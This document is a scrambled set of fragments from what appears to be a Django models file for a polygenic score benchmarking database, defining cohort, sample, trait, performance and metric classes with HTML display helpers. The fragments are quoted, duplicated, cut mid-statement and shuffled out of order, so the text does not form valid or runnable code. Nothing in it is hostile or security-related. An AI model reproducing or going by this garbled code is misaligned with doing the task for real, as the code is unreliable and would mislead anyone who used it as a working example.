null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources", "class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point", "(e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional", "# return self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self):", "title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\"", "desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS", "= models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range", "choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) #", "than filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l =", "if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold", "models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short", "self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self): # return", "models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance')", "= '' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases =", "None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit)", "@property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self):", "if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free)", "ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True)", "null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci", "se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci !=", "on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding,", "[years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100,", "(len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return", "null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id,", "the queryset metrics = self.performance_metric.all() if metrics: l = [] for m in", "'' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range", "@property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set()", "models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False)", "= 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification", "(sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)',", "else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return", "def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if", "category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories =", "(PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type", "max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open range", "# Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female',", "class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' # Estimate e", "unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range =", "#@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): #", "related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\")", "metric_type): \"\"\" Generic method to extract and format the diverse metric data\"\"\" #", "def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list =", "effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list:", "describe the International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code", "= { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list:", "__str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent =", "count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)',", "related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s", "{} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list:", "Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label =", "metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l", "Estimate e = '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(),", "(GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True)", "self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return", "str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range != None and", "name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000)", "= models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self):", "verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s", "# categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample", "get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse metric data\"\"\"", "and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals',", "or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True,", "if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s)", "db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\"", "len(categories) > 0: # category_labels = [] # for category in categories: #", "= [] # for category in categories: # v_spacing = ' class=\"mt-1\"' if", "null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci", "PGS and a set of samples\"\"\" # Links to related objects score_id =", "# categories_data = '' # if len(category_labels) > 0: # categories_data = ',", "{}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short,", "else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s =", "self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype", "default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex:", "'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return", "performance/accuracy metrics for a PGS and a set of samples\"\"\" # Links to", "Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description',", "followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True)", "= {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in", "name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short =", "class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to", "r != None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) >", "ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True)", "self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data =", "e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)',", "'{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]:", "models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional =", "def format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range))", "l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip =", "return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list #", "cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring +=", "#def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if len(category_labels)", "range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower()", "l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l", "used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code", "= models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free", "Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS", "self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return", "else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]:", "else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if", "intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)',", "(value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit", "= models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms',", "pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring +=", "Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds", "# scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate:", "'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list:", "sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i", "\"\"\"Abstract class to hold information related to controlled trait vocabulary (mainly to link", "sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if", "self.estimate != None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() ==", "Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype", "to describe samples used in variant associations and PGS training/testing\"\"\" # Sample Information", "get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return", "models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free =", "on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM',", "'{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip = '<span title=\"{}\"", "describe Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate", "estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g.", "+= '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '',", "doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort", "models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric", "'', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to", "# e.g. Confidence interval (ci), range, interquartile range (iqr), open range variability =", "if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability,", "= models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional", "> 0: l.append(e) # Variability v = None if self.variability != None: type_desc", "models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of',", "'[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None:", "len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def", "effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = []", "self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) #", "= [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics']", "self.performance_metric.all() if metrics: l = [] for m in metrics: if (m.type ==", "None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals", "def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad,", "be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate", "cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not", "type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not", "return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence", "= models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type =", "range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') #", "str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1): return l[0]", "size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se =", "#e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months,", "models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if", "len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property", "null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped", "Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of", "return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type,", "= models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def", "distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean')", "self.unit) return None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span>", ": {} {}' no_helptip = '{} : {} {}' # Estimate e =", "models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'),", "!= None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if", "({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals", "othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return", "# if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return []", "open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se')", "m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to", "null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True)", "\"\"\" Generic method to extract and format the diverse metric data\"\"\" # Using", "'{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS", "PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500,", "\"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100,", "'<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if", "'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id)", "MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification", "# category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) > 0:", "def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent", "a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES", "= models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad =", "@property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self):", "= str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range)", "'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES,", "v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\"", "of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type", "days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') #", "</span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring", "!= None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1):", "if len(categories) > 0: # category_labels = [] # for category in categories:", "(type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se) def format_estimate(self):", "= models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample',", "l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class", "## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French,", "to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">'", "not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type]", "> 0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self):", "'' if self.estimate != None: estimate = str(self.estimate) if self.range != None and", "import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields", "phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types", "#def category_labels_list(self): # categories = self.category_list # if len(categories) > 0: # return", "= helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v", "models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID)", "= models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country", "to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample =", "null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard", "# e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range", "| %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return", "sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES =", "('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' )", "def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if", "for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0", "label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True)", "Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology", "sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ]", "and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability", "filter afterward uses less SQL queries than filtering directly on the queryset metrics", "estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100,", "'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class", "if len(e) > 0: l.append(e) # Variability v = None if self.variability !=", "if (len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else:", "def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list:", "Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s |", "null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self):", "('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40,", "# categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories", "deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type,", "format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if", "+= '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases)", "default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years,", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self):", "* 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk)", "if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data", "in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all():", "\"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores", "Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source", "len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def", "f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,}", "'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name =", "!= None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s", "id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500,", "= models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property", "'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range", "perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract", "not in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r", "cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s |", "if estimate: l[self.estimate_type] = estimate # Range if self.range != None and '['", "phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self):", "= models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID", "self.estimate) if self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range))", "return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries']", "None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold", "__str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by =", "self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def", "e.g. standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None:", "if self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(),", "= models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate',", "| ') # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(),", "s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name,", "that can be point estimates or distributions\"\"\" estimate = 